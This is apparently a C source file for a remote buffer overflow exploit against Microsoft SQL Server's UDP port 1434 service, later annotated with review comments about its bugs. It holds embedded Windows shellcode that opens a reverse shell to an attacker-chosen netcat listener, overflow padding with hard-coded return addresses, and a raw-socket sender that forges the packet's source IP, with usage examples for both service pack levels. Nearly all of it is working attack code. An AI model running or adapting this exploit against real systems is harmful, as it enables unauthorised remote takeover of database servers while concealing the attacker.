/* SPOOFING version of sql server exploit!
   provided by johnqpublic2323@yahoo.com
   (there was no header when I found this) */

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <unistd.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <signal.h>
#include <netinet/udp.h>
   
   

/* Internet checksum routine; defined (K&R style) at the bottom of this file. */
unsigned short in_cksum(u_short *, int );

/* Not referenced anywhere in this file. */
struct sockaddr_in c_sa;
struct sockaddr_in s_sa;
   
/* Not referenced anywhere in this file. */
struct hostent *he;
unsigned long addr;
/* Not referenced: main() passes the destination port to sendudp() as a literal. */
int SQLUDPPort=1434;
/* Filled from argv[1] in main() and never read afterwards. */
char host[256]="";
/* Outgoing UDP payload.  Starts with a single 0x04 byte; main() appends the
   filler, five fixed byte groups, and then `explen` bytes copied from the
   patched payload buffer. */
char request[4000]="\x04";

/* Number of bytes memcpy'd into `request` from the payload copy: one less
   than sizeof exploit_code, i.e. everything but the terminating NUL. */
int explen=361;
/* Total byte count of `request` handed to sendudp(); set in main(). */
int len;
   
/* Opaque byte string; the usage banner in main() attributes it to
   "Advanced Windows Shellcode".  main() patches byte 9 in place (the "SP 0"
   case) and, after copying it into a local buffer, overwrites bytes 142-145
   of the copy with the inet_addr() value of argv[2] and bytes 160-161 with
   htons(argv[3]) XOR 0xFFFF.  The bytes are left as found and are not
   decoded further here. */
char exploit_code[362]=
   "\x55\x8B\xEC\x68\x18\x10\xAE\x42\x68\x1C"
   "\x10\xAE\x42\xEB\x03\x5B\xEB\x05\xE8\xF8"
   "\xFF\xFF\xFF\xBE\xFF\xFF\xFF\xFF\x81\xF6"
   "\xAE\xFE\xFF\xFF\x03\xDE\x90\x90\x90\x90"
   "\x90\x33\xC9\xB1\x44\xB2\x58\x30\x13\x83"
   "\xEB\x01\xE2\xF9\x43\x53\x8B\x75\xFC\xFF"
   "\x16\x50\x33\xC0\xB0\x0C\x03\xD8\x53\xFF"
   "\x16\x50\x33\xC0\xB0\x10\x03\xD8\x53\x8B"
   "\x45\xF4\x50\x8B\x75\xF8\xFF\x16\x50\x33"
   "\xC0\xB0\x0C\x03\xD8\x53\x8B\x45\xF4\x50"
   "\xFF\x16\x50\x33\xC0\xB0\x08\x03\xD8\x53"
   "\x8B\x45\xF0\x50\xFF\x16\x50\x33\xC0\xB0"
   "\x10\x03\xD8\x53\x33\xC0\x33\xC9\x66\xB9"
   "\x04\x01\x50\xE2\xFD\x89\x45\xDC\x89\x45"
   "\xD8\xBF\x7F\x01\x01\x01\x89\x7D\xD4\x40"
   "\x40\x89\x45\xD0\x66\xB8\xFF\xFF\x66\x35"
   "\xFF\xCA\x66\x89\x45\xD2\x6A\x01\x6A\x02"
   "\x8B\x75\xEC\xFF\xD6\x89\x45\xEC\x6A\x10"
   "\x8D\x75\xD0\x56\x8B\x5D\xEC\x53\x8B\x45"
   "\xE8\xFF\xD0\x83\xC0\x44\x89\x85\x58\xFF"
   "\xFF\xFF\x83\xC0\x5E\x83\xC0\x5E\x89\x45"
   "\x84\x89\x5D\x90\x89\x5D\x94\x89\x5D\x98"
   "\x8D\xBD\x48\xFF\xFF\xFF\x57\x8D\xBD\x58"
   "\xFF\xFF\xFF\x57\x33\xC0\x50\x50\x50\x83"
   "\xC0\x01\x50\x83\xE8\x01\x50\x50\x8B\x5D"
   "\xE0\x53\x50\x8B\x45\xE4\xFF\xD0\x33\xC0"
   "\x50\xC6\x04\x24\x61\xC6\x44\x24\x01\x64"
   "\x68\x54\x68\x72\x65\x68\x45\x78\x69\x74"
   "\x54\x8B\x45\xF0\x50\x8B\x45\xF8\xFF\x10"
   "\xFF\xD0\x90\x2F\x2B\x6A\x07\x6B\x6A\x76"
   "\x3C\x34\x34\x58\x58\x33\x3D\x2A\x36\x3D"
   "\x34\x6B\x6A\x76\x3C\x34\x34\x58\x58\x58"
   "\x58\x0F\x0B\x19\x0B\x37\x3B\x33\x3D\x2C"
   "\x19\x58\x58\x3B\x37\x36\x36\x3D\x3B\x2C"
   "\x58\x1B\x2A\x3D\x39\x2C\x3D\x08\x2A\x37"
   "\x3B\x3D\x2B\x2B\x19\x58\x58\x3B\x35\x3C"
   "\x58";
   
   
/* Entry point.  Arguments (see the usage text below): argv[1] target,
   argv[2] <NCHost>, argv[3] <NCPort>, argv[4] <SQLSP>, argv[5] <spoofed ip>.
   NOTE(review): the guard accepts argc == 2 as well as 6, but argv[2], argv[3],
   argv[4] and argv[5] are read unconditionally further down; with argc == 2
   that dereferences argv[2] (NULL) and reads past the end of the argv array.
   Opens a raw IP socket, so the process needs the privilege for that
   (root / CAP_NET_RAW on Linux).  Returns 0 on every path it reaches. */
int main(int argc, char **argv) {
   int s;
   unsigned long lsaddr,ldaddr;
   char ipaddress[40]="";
   unsigned short port = 0;
   unsigned int ip = 0;
   char *ipt="";
   char buffer[400]="";
   unsigned short prt=0;
   char *prtt="";
   
   
   if(argc != 2 && argc != 6) {
      printf("===============================================================\r\n");
      printf("SQL Server UDP Buffer Overflow Remote Exploit\r\n\n");
      printf("Modified from \"Advanced Windows Shellcode\"\r\n");
      printf("Code by David Litchfield, david@ngssoftware.com\r\n");
      printf("Modified by lion, fix a bug.\r\n");
      printf("Welcome to HUC Website http://www.cnhonker.com\r\n\n");
      printf("heh -wirepair now with spoofiliciousness, try using victims dns server for spoof ip.\n");
      printf("Usage:\r\n");
      printf(" %s Target [<NCHost> <NCPort> <SQLSP> <spoofed ip>]\r\n\n", argv[0]);
      printf("Example:\r\n");
      printf(" nc -l -p 53\r\n");
      printf("Target is MSSQL SP 0:\r\n");
      printf(" %s 192.168.0.1 192.168.7.1 53 0 215.34.234.235\r\n",argv[0]);
      printf("Target is MSSQL SP 1 or 2:\r\n");
      printf(" %s 192.168.0.1 192.168.7.1 53 1 62.2.3.4\r\n\n", argv[0]);
      return 0;
   }
   
   /* host[] is zero-initialised, so the 100-byte copy is always NUL-terminated;
      it is never read again (argv[1] is re-parsed for the destination below). */
   strncpy(host, argv[1], 100);
   
   /* ipaddress[] is zero-initialised, so the 36-byte copy stays NUL-terminated. */
   strncpy(ipaddress, argv[2], 36);
   
   /* No validation: a non-numeric argv[3] becomes port 0. */
   port = atoi(argv[3]);
   
   
     /* Only the first character of argv[4] is checked, against '0' (0x30). */
     if(argv[4][0] == 0x30) {
        printf("MSSQL SP 0. GetProcAddress @0x42ae1010\r\n");
        /* Patches the global payload in place; the else branch leaves the
           initialiser's byte 9 (0x1C) as it is. */
        exploit_code[9]=0x10;
      } else {
        printf("MSSQL SP 1 or 2. GetProcAddress @0x42ae101C\r\n");
      }
   /* Copies the payload up to its first NUL into the zero-filled 400-byte local. */
   strcpy(buffer,exploit_code);
   
   /* argv[2] as a 32-bit network-order value, written byte-wise at 142-145.
      inet_addr() returns INADDR_NONE on a malformed address; that is not checked. */
   ip = inet_addr(ipaddress);
   ipt = (char*)&ip;
   buffer[142]=ipt[0];
   buffer[143]=ipt[1];
   buffer[144]=ipt[2];
   buffer[145]=ipt[3];
   /* Port in network byte order, XORed with 0xFFFF, stored at bytes 160-161. */
   prt = htons(port);
   prt = prt ^ 0xFFFF;
   prtt = (char *) &prt;
   buffer[160]=prtt[0];
   buffer[161]=prtt[1];
   
   /* 96-byte filler (24 four-byte groups) appended after the leading 0x04. */
   strcat(request,"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXX");
   
   
   /* Five fixed byte groups appended as-is; the last one is eight 0x90 bytes. */
   strcat(request,"\xDC\xC9\xB0\x42");
   strcat(request,"\xEB\x0E\x41\x42\x43\x44\x45\x46");
   strcat(request,"\x01\x70\xAE\x42");
   strcat(request,"\x01\x70\xAE\x42");
   strcat(request,"\x90\x90\x90\x90\x90\x90\x90\x90");
   
   /* Total length = current string length + explen.  The payload is appended
      with memcpy() rather than strcat(), so `request` need not stay
      NUL-terminated; `len` is what sendudp() uses. */
   len = strlen(request)+ explen;
   memcpy(request+strlen(request), buffer, explen);
   /* Raw IP socket; sendudp() builds the IP and UDP headers itself. */
   s = socket(AF_INET,SOCK_RAW,IPPROTO_RAW);
   /* NOTE(review): exits with status 0 on failure, i.e. reports success to the shell. */
   if (s == -1) { printf("Couldnt open Raw socket!!\n"); exit(0); }
      
   /* Source address is taken from argv[5] (spoofed); argv[1] is parsed as the
      destination.  INADDR_NONE from inet_addr() is not checked for either. */
   lsaddr = inet_addr(argv[5]);
   ldaddr = inet_addr(argv[1]);
   printf("b0ing\n"); 
   /* sendudp() is defined further down with no prototype before this call
      (implicit declaration).  Source port 53 and destination port 1434 are
      hard-coded here; SQLUDPPort and the argv[3] value are not used for the
      datagram itself. */
   sendudp(s,&lsaddr,&ldaddr,53,1434,request,len);
    
   return 0;
}
   
/* Builds one IPv4/UDP datagram with a caller-supplied source address and
   sends it on the raw socket `sock`.  Header field names are the Linux/glibc
   `struct iphdr` / `struct udphdr` layout.
   saddr, daddr: addresses in network byte order, read through the pointers.
   sport, dport: ports in host byte order.  data, len: payload and its length.
   Always returns 0; calls exit() on malloc() or sendto() failure. */
int sendudp(int sock,unsigned long *saddr, unsigned long *daddr,unsigned int sport,unsigned int dport,char *data, int len) {
    /* 64000-byte stack buffer, used only by the read() at the end. */
    char recvbuf[64000];
    char *packet;
    int ret;
    /* Not zeroed: sin_port and sin_zero stay uninitialised below. */
    struct sockaddr_in client;
    struct iphdr *ip;
    struct udphdr *udp;
    packet = (char *)malloc(sizeof(struct iphdr)+sizeof(struct udphdr)+len);
    /* NOTE(review): memset() writes through `packet` before the NULL check
       on the next line. */
    memset(packet,0,sizeof(struct iphdr) + sizeof(struct udphdr) + len);
    if (packet == NULL) { printf("Malloc failed\n"); exit(-1); }
    ip = (struct iphdr *)packet;
    udp = (struct udphdr *)(packet+sizeof(struct iphdr));
    ip->saddr = *saddr;
    ip->daddr = *daddr;
    ip->version = 4;
    ip->ihl = 5;
    /* Fixed TTL. */
    ip->ttl = 255;
    /* rand() is never seeded in this file, so the IP ID sequence repeats
       identically on every run. */
    ip->id = htons((unsigned short) rand());
    ip->protocol = IPPROTO_UDP;
    ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct udphdr)+len);
    /* Computed before the UDP header and payload are filled in.  As written,
       in_cksum() consumes 2*len bytes (see its notes), so this covers 40 bytes:
       the IP header plus the still-zeroed UDP header and first 12 payload bytes.
       NOTE(review): on Linux IPPROTO_RAW sockets the kernel fills the IP
       header checksum itself (raw(7)) — confirm for the target platform. */
    ip->check = in_cksum((u_short *)ip, sizeof(struct iphdr));
    udp->source = htons(sport);
    udp->dest = htons(dport);
    /* udp->check is left at 0 from the memset(): for UDP over IPv4 that means
       "no checksum" (RFC 768). */
    udp->len = htons(sizeof(struct udphdr) + len);
    memcpy(packet+(sizeof(struct iphdr) + sizeof(struct udphdr)),data,len);
    client.sin_family = AF_INET;
    client.sin_addr.s_addr = *daddr;
    ret = sendto(sock, packet, sizeof(struct iphdr) + sizeof(struct udphdr)+len,0,(struct sockaddr *)&client,sizeof(struct sockaddr_in));
    free(packet);
    if ( ret < 0) {
           perror("sendto");
           exit(1);
    }
    printf("Packet sent!\r\n");
    printf("If you don't have a shell it didn't work.\r\n");
    /* Return value is stored and never used.  NOTE(review): Linux IPPROTO_RAW
       sockets are send-only (raw(7)), so this read() is expected to fail —
       confirm. */
    ret = read(sock, &recvbuf, sizeof(recvbuf));
    /* Unconditionally 0; the caller in main() ignores it. */
    return(0);
}

/* 16-bit word sum over `addr`, used by sendudp() as the IPv4 header checksum
   (it passes sizeof(struct iphdr) == 20).  K&R-style definition; the
   prototype at the top of the file is the ANSI form.
   NOTE(review): this does not match the RFC 1071 routine.  Each loop
   iteration consumes two 16-bit words while decrementing nleft by only 2, so
   it reads 2*len bytes for an even len; the fold shifts by 17 rather than 16,
   and the result is negated rather than one's-complemented.  Behaviour is
   left as found and documented here rather than changed. */
unsigned short in_cksum(addr, len)
 u_short *addr;
 int len;
 {
    /* Byte count still to process; decremented by 2 per iteration even though
       the body advances `w` by two words (4 bytes). */
    register int nleft = len;
    register u_short *w = addr;
    register int sum = 0;
    u_short answer = 0;

    while (nleft > 1) {
       sum += *w++;
       sum += *w++;
       nleft -= 2;
    }
    /* Odd trailing byte (not reached for len == 20): folded in as the low
       byte of `answer`. */
    if (nleft == 1) {
       *(u_char *) (&answer) = *(u_char *) w;
       sum += answer;
    }
    /* Fold, shifting by 17 (RFC 1071 shifts by 16). */
    sum = (sum >> 17) + (sum & 0xffff);
    sum += (sum >> 17);
    /* Arithmetic negation truncated to 16 bits (RFC 1071 uses ~sum). */
    answer = -sum;
    return (answer);
}


